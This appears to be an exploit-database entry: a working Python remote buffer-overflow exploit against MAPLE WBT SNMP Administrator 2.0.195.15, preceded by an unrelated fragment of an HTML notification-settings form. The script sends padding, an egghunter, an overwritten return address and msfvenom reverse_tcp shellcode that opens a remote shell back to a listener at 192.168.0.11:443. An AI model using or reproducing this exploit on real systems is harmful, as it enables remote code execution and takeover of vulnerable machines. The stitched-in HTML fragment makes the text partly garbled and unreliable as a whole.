type="hidden" name="notifyButton_color_popup_button_background_active" value="" /> <input type="hidden" name="notifyButton_color_popup_button_color" value="" /> <input type="hidden" name="notifyButton_message_prenotify" value="" /> <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" /> <input type="hidden" name="notifyButton_tip_state_subscribed" value="" /> <input type="hidden" name="notifyButton_tip_state_blocked" value="" /> <input type="hidden" name="notifyButton_message_action_subscribed" value="" /> <input type="hidden" name="notifyButton_message_action_resubscribed" value="" /> <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" /> <input type="hidden" name="notifyButton_dialog_main_title" value="" /> <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" /> <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" /> <input type="hidden" name="notifyButton_dialog_blocked_title" value="" /> <input type="hidden" name="notifyButton_dialog_blocked_message" value="" /> <input type="hidden" name="prompt_customize_enable" value="true" /> <input type="hidden" name="prompt_action_message" value="" /> <input type="hidden" name="prompt_auto_accept_title" value="" /> <input type="hidden" name="prompt_site_name" value="" /> <input type="hidden" name="prompt_example_notification_title_desktop" value="" /> <input type="hidden" name="prompt_example_notification_message_desktop" value="" /> <input type="hidden" name="prompt_example_notification_title_mobile" value="" /> <input type="hidden" name="prompt_example_notification_message_mobile" value="" /> <input type="hidden" name="prompt_example_notification_caption" value="" /> <input type="hidden" name="prompt_accept_button_text" value="" /> <input type="hidden" name="prompt_cancel_button_text" value="" /> <input type="hidden" name="send_welcome_notification" value="true" /> <input type="hidden" name="welcome_notification_title" value="" /> <input type="hidden" name="welcome_notification_message" value="" /> <input type="hidden" name="welcome_notification_url" value="" /> <input type="hidden" name="notification_on_post" value="true" /> <input type="hidden" name="utm_additional_url_params" value="" /> <input type="hidden" name="allowed_custom_post_types" value="" /> <input type="hidden" name="custom_manifest_url" value="" /> <input type="hidden" name="show_notification_send_status_message" value="true" /> <input type="submit" value="Send" /> </form> </body> </html>

# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter) # Author: sasaga92 # Discovery Date: 2019-07-18 # Vendor Homepage: www.computerlab.com # Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager # Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE # Tested on OS: Windows XP SP2 x86 # CVE: N/A # [+] Credits: John Page (aka hyp3rlinx) #!/usr/bin/python import sys import socket import random import string import struct def pattern_create(_type,_length): _type = _type.split(" ") if _type[0] == "trash": return _type[1] * _length elif _type[0] == "random": return ''.join(random.choice(string.lowercase) for i in range(_length)) elif _type[0] == "pattern": _pattern = '' _parts = ['A', 'a', '0'] while len(_pattern) != _length: _pattern += _parts[len(_pattern) % 3] if len(_pattern) % 3 == 0: _parts[2] = chr(ord(_parts[2]) + 1) if _parts[2] > '9': _parts[2] = '0' _parts[1] = chr(ord(_parts[1]) + 1) if _parts[1] > 'z': _parts[1] = 'a' _parts[0] = chr(ord(_parts[0]) + 1) if _parts[0] > 'Z': _parts[0] = 'A' return _pattern else: return "Not Found" def pwned(_host, _port, _payload): print "[*] Conectandose a {0}:{1}...".format(_host, _port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((_host, _port)) print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload)) _payload = "{0}\r\n\r\n".format(_payload) s.send(_payload) _data = s.recv(1024) s.shutdown s.close print 'Recibido:', repr(_data) print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload)) def main(): _host = "192.168.0.12" _port = 987 _offset_eip = 642200 _padding = 642144 _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3 _tag = "w00tw00t" #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d" "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70" "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44" "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f" "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59" "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42" "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e" "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51" "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53" "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b" "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34" "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63" "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50" "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b" "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e" "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44" "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b" "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b" "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52" "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c" "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e" "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64" "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e" "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b" "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72" "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70" "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a" "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45" "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46" "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57" "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31" "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f" "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75" "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70" "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78" "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36" "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49" "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58" "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70" "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55" "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a" "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65" "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79" "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31" "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37" "\x70\x73\x63\x69\x6f\x59\x45\x41\x41") _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") _inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode)) _inject += _tag _inject += _shellcode _inject += _egghunter _inject += pattern_create("trash B", _offset_eip-len(_inject)) _inject += _eip print(_inject) pwned(_host,_port,_inject) if __name__ == "__main__": main()